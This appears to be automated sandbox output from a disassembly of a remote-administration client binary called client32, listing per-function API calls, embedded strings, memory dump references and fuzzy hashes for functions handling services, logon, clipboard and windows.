LoadLibraryExA.KERNEL32(?,00000000,00000002,?,1105649A), ref: 110ED336
GetSystemDirectoryA.KERNEL32(?,00000104), ref: 110ED351
LoadLibraryExA.KERNEL32(?,00000000,00000002,?,1105649A), ref: 110ED38D
GetLastError.KERNEL32(?,1105649A), ref: 110ED398
FormatMessageA.KERNEL32(00000900,?,?,00000000,?,00000000,?,00000000,?,1105649A), ref: 110ED3DD
LocalFree.KERNEL32(?,?,1105649A), ref: 110ED45C
_memmove.LIBCMT ref: 110ED48D

Strings

\PCImsg.dll, xrefs: 110ED308, 110ED368
??? , xrefs: 110ED462
Cannot find message %d, xrefs: 110ED3E8
Cannot open file %s, error %d, xrefs: 110ED3A6
%s (%d), xrefs: 110ED439

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: LibraryLoad$DirectoryErrorFileFormatFreeLastLocalMessageModuleNameSystem_memmove_strrchr
String ID: %s (%d)$??? $Cannot find message %d$Cannot open file %s, error %d$\PCImsg.dll
API String ID: 3675426511-2756047042
Opcode ID: 24b43653ea149b7fc03000e038b4f402e07b261599e85d7f4999701ef2a47801
Instruction ID: ced640a395ebe727b00206b968de0e8db358c6ace47da34f22fb5d2595477f7d
Opcode Fuzzy Hash: 24b43653ea149b7fc03000e038b4f402e07b261599e85d7f4999701ef2a47801
Instruction Fuzzy Hash: EB5119B5E0021AAFD704CF79DC89FDEF7B8EB59308F0480A9E955D7240EA71A9448B91

Function 110993D0 Relevance: 21.3, APIs: 1, Strings: 11, Instructions: 285timeCOMMON

Download Yara Rule

APIs

Part of subcall function 110C57C0: __strdup.LIBCMT ref: 110C57DA

Part of subcall function 110C5870: _free.LIBCMT ref: 110C589D

Part of subcall function 110C6420: wvsprintfA.USER32(?,?,?), ref: 110C644B

Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069

GetLocalTime.KERNEL32(?), ref: 110996E8

Strings

%s\%s, xrefs: 11099551
_%04d_%02d_%02d_%02d%02d, xrefs: 11099716
%s\, xrefs: 110995A3
[JNL] MakeFileName ret %s, xrefs: 11099792
LESSON=, xrefs: 11099450
e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h, xrefs: 11099570, 110995CA, 110995FE, 11099653, 11099687, 1109977C
\/:*?"<>|, xrefs: 1109948F, 11099506
CLASSID=, xrefs: 110994CB
%s_, xrefs: 11099617
_%s, xrefs: 110996A0
IsA(), xrefs: 11099575, 110995CF, 11099603, 11099658, 1109968C, 11099781

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitLastLocalMessageProcessTime__strdup_freewsprintfwvsprintf
String ID: %s\$%s\%s$%s_$CLASSID=$IsA()$LESSON=$[JNL] MakeFileName ret %s$\/:*?"<>|$_%04d_%02d_%02d_%02d%02d$_%s$e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h
API String ID: 2014016395-1608741677
Opcode ID: 0fd4456cd1454aaea42f8db4d31fc9a623690e4a7d001beea3509e37da29d07c
Instruction ID: addf530891e37868822e31691bf17d6718b8effada6f07c03448ee7c6713f98b
Opcode Fuzzy Hash: 0fd4456cd1454aaea42f8db4d31fc9a623690e4a7d001beea3509e37da29d07c
Instruction Fuzzy Hash: C0B1AA79E0051AABDB25DB65CD50FEEF7B4AF58B08F4040D8E80963281EB317B44CEA5

Function 11119810 Relevance: 21.0, APIs: 10, Strings: 2, Instructions: 49servicesleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?,75A73760,?,11119AC3,11119BA8,?,?,11119B6E,?), ref: 11119818
OpenSCManagerA.ADVAPI32(00000000,ServicesActive,00000001,?,11119AC3,11119BA8,?,?,11119B6E,?), ref: 11119827
OpenServiceA.ADVAPI32(00000000,SCardSvr,000F01FF,?,75A77A80,?,11119AC3,11119BA8,?,?,11119B6E,?), ref: 11119840
StartServiceA.ADVAPI32(00000000,00000000,00000000,?,11119AC3,11119BA8,?,?,11119B6E,?), ref: 11119857
GetLastError.KERNEL32(?,11119AC3,11119BA8,?,?,11119B6E,?), ref: 1111985D
CloseServiceHandle.ADVAPI32(00000000,?,11119AC3,11119BA8,?,?,11119B6E,?), ref: 11119864
CloseServiceHandle.ADVAPI32(00000000,?,11119AC3,11119BA8,?,?,11119B6E,?), ref: 11119867
GetLastError.KERNEL32(?,11119AC3,11119BA8,?,?,11119B6E,?), ref: 11119870
CloseServiceHandle.ADVAPI32(00000000,?,11119AC3,11119BA8,?,?,11119B6E,?), ref: 11119877
GetLastError.KERNEL32(?,11119AC3,11119BA8,?,?,11119B6E,?), ref: 11119880

Strings

ServicesActive, xrefs: 11119820
SCardSvr, xrefs: 1111983A

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Service$CloseErrorHandleLast$Open$ManagerSleepStart
String ID: SCardSvr$ServicesActive
API String ID: 1921798787-154187340
Opcode ID: a1b1b34182aec26b6a33cde0a091ff4511d5589f56586ec388c5b12c3f1daa19
Instruction ID: dd90352842637b905b53167e33cf983425e662465ecb601792dce42ff377f5cb
Opcode Fuzzy Hash: a1b1b34182aec26b6a33cde0a091ff4511d5589f56586ec388c5b12c3f1daa19
Instruction Fuzzy Hash: FEF06D373415656FD20227A5BCCCFEEFB2CEB85756F104231F715961488A6194128779

Function 1114D430 Relevance: 17.9, APIs: 8, Strings: 2, Instructions: 440COMMON

Download Yara Rule

APIs

SetWindowLongA.USER32(?,000000FC,?), ref: 1114D476
RemovePropA.USER32(?), ref: 1114D495
RemovePropA.USER32(?), ref: 1114D4A4
RemovePropA.USER32(?,00000000), ref: 1114D4B3

Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069

CallWindowProcA.USER32(?,?,?,?,?), ref: 1114D80A

Strings

..\ctl32\wndclass.cpp, xrefs: 1114D448
old_wndproc, xrefs: 1114D44D

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: PropRemove$Window$CallErrorExitLastLongMessageProcProcesswsprintf
String ID: ..\ctl32\wndclass.cpp$old_wndproc
API String ID: 1777853711-3305400014
Opcode ID: 1b3096391e9100c0dff8ec288cab940e3f3d68445cee506a92fe49f2f52b3cec
Instruction ID: a9ca4b3d29b6757e08e08d1351ada2b625a191a468bc1592360ff9c51f34a9c8
Opcode Fuzzy Hash: 1b3096391e9100c0dff8ec288cab940e3f3d68445cee506a92fe49f2f52b3cec
Instruction Fuzzy Hash: CAC15DB63040199FDB08CE69E894E7FB3E9EBC8711B50466EF946C7781DA31AC1187B1

Function 11023040 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 231windowthreadCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 110230A0
_strncpy.LIBCMT ref: 110230AC
_memset.LIBCMT ref: 11023203
_strncpy.LIBCMT ref: 1102320C
IsWindow.USER32(00000000), ref: 11023222
IsIconic.USER32(00000000), ref: 11023240
BringWindowToTop.USER32(00000000), ref: 1102325D
GetCurrentThreadId.KERNEL32 ref: 11023297

Strings

RDH::Dialog already created so restore, xrefs: 1102322C

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Window_memset_strncpy$BringCurrentIconicThread
String ID: RDH::Dialog already created so restore
API String ID: 2558468902-3779292929
Opcode ID: 3a29e25499038395078530fbfc39c303dfee48ec46b0e450d5d02466cdabe91f
Instruction ID: 9fb44cbcd3b538895b0def4521801f9bfde370520260cf145bbd00386ee71607
Opcode Fuzzy Hash: 3a29e25499038395078530fbfc39c303dfee48ec46b0e450d5d02466cdabe91f
Instruction Fuzzy Hash: 5591A175E046099FDB00CFA9C884BEEBBF5BF89308F548569E8159B381DB74A944CF90

Function 11031430 Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 312COMMON

Download Yara Rule

Strings

DisableClipBoard, xrefs: 110314B9, 110315C6, 11031755
Client, xrefs: 110314BE, 110315CB, 1103175A
CheckClip Error: Can't open clip, e=%d, xrefs: 11031510
openclip Error: Cant open clip, xrefs: 11031702
Sendclip Error: Cant open clip, xrefs: 1103158D

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID:
String ID: CheckClip Error: Can't open clip, e=%d$Client$DisableClipBoard$Sendclip Error: Cant open clip$openclip Error: Cant open clip
API String ID: 0-293745777
Opcode ID: 127b5213422b15e425346da24cd16221a59b034f56f518ca3ab0e2a8f7d037f5
Instruction ID: 6deb9f8abc6a4cad7d773f1ab5b5bd319d2f4c8d3dcf5da947e35b6bef66306d
Opcode Fuzzy Hash: 127b5213422b15e425346da24cd16221a59b034f56f518ca3ab0e2a8f7d037f5
Instruction Fuzzy Hash: 04A1D275F102059FD710DBA4DC80FAAB3B5AFDD319F144199EA4A9B280EB71F940CB91

Function 110E9400 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 99COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 110E940F
LogonUserA.ADVAPI32(?,00000000,?,?,?,FFFFFFFF), ref: 110E94BE
GetTickCount.KERNEL32 ref: 110E94C6
GetLastError.KERNEL32 ref: 110E94FE

Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069

Strings

e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h, xrefs: 110E9446, 110E9472
null, xrefs: 110E94DB, 110E94E4
LogonUser(%s, %s) took %d ms, ret %d, xrefs: 110E94E6
IsA(), xrefs: 110E944B, 110E9477

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CountErrorLastTick$ExitLogonMessageProcessUserwsprintf
String ID: IsA()$LogonUser(%s, %s) took %d ms, ret %d$e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h$null
API String ID: 307273675-931856353
Opcode ID: 542ecd84b7764c589124868231b19b0268137c9ef5a69bea329ee57c5c71da03
Instruction ID: f479a602a004497ae36e32c9422561ea4b7ba1cfc2dda626e9e37eed398c0a62
Opcode Fuzzy Hash: 542ecd84b7764c589124868231b19b0268137c9ef5a69bea329ee57c5c71da03
Instruction Fuzzy Hash: 4431A2B9A00A06AFC720DF56DC88E9AF7F9FF88314B108258E81593751EB30F905CB60

Function 11031080 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 87clipboardCOMMON

Download Yara Rule

APIs

IsClipboardFormatAvailable.USER32(?), ref: 110310C1
GetClipboardData.USER32(?), ref: 110310DD
GetClipboardFormatNameA.USER32(?,?,00000050), ref: 1103115C
GetLastError.KERNEL32 ref: 11031166
GlobalUnlock.KERNEL32(00000000), ref: 11031186

Strings

pData && pSize, xrefs: 110310B3
..\ctl32\clipbrd.cpp, xrefs: 110310AE

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Clipboard$Format$AvailableDataErrorGlobalLastNameUnlock
String ID: ..\ctl32\clipbrd.cpp$pData && pSize
API String ID: 1861668072-1296821031
Opcode ID: 72918964a1369d3bb2368425b4338c3315936ac85280862e7e4cd8f3fdf3f6c4
Instruction ID: 3a2d50e1deb99135114f4ad4be661bc5fe19da930bc3f706a95416d91adfb30e
Opcode Fuzzy Hash: 72918964a1369d3bb2368425b4338c3315936ac85280862e7e4cd8f3fdf3f6c4
Instruction Fuzzy Hash: 0D21A136F1015A9FD701DFE598819FEF7FDEF8D319B1040AAE815D7204EA3199008B90

Function 110B7590 Relevance: 6.1, APIs: 4, Instructions: 93windowthreadCOMMON

Download Yara Rule

APIs

IsIconic.USER32(000000FF), ref: 110B761D
ShowWindow.USER32(000000FF,00000009,?,110594F3,00000001,00000001,?,00000000), ref: 110B762D
BringWindowToTop.USER32(000000FF), ref: 110B7637
GetCurrentThreadId.KERNEL32 ref: 110B7658

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Window$BringCurrentIconicShowThread
String ID:
API String ID: 4184413098-0
Opcode ID: d925559f559c2a1babfa56e082f61c15d26bdf959c9a64c67aafbf439c555b20
Instruction ID: ad5466151a3d102bc84d22bce7331062c3264b6d9f279f2b8dca4e33c95fbde4
Opcode Fuzzy Hash: d925559f559c2a1babfa56e082f61c15d26bdf959c9a64c67aafbf439c555b20
Instruction Fuzzy Hash: 9731917AE016159FDB14DF28D8C0BDA7BA4AF48354F09846AEC059F386D774E844CBE4

Function 11031300 Relevance: 3.0, APIs: 2, Instructions: 49clipboardCOMMON

Download Yara Rule

APIs

GetClipboardFormatNameA.USER32(?,?,00000050), ref: 11031356
SetClipboardData.USER32(00000000,00000000), ref: 11031372

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Clipboard$DataFormatName
String ID:
API String ID: 3172747766-0
Opcode ID: c368b33a726b0f3c658c7c5764f9fe45bd421e2bcf66c613ff5b6d93b4405f57
Instruction ID: 5a9ba92f3b64397a12cca0f87665bff893f2c78cd86a97b99a1c74ad90e41dcc
Opcode Fuzzy Hash: c368b33a726b0f3c658c7c5764f9fe45bd421e2bcf66c613ff5b6d93b4405f57
Instruction Fuzzy Hash: B701B574D26514EED700DF60884097EB3BCAF8964BF108196EC4095484EF35960086A6

Function 110A9340 Relevance: .4, Instructions: 358COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 087fb6f09db23df2f9243fa4c522680dfe1a7985385991fb585f9c163f558642
Instruction ID: 59c7b7f747d3cd42b9f612744a0310afd918764f6223c133cab6fe92f698de0c
Opcode Fuzzy Hash: 087fb6f09db23df2f9243fa4c522680dfe1a7985385991fb585f9c163f558642
Instruction Fuzzy Hash: 19C16875B041A20BEB19CEBD88903AE7FE3DBC5301F1981B9D9E587786E978D101D760

Function 1101B5A0 Relevance: .3, Instructions: 336COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

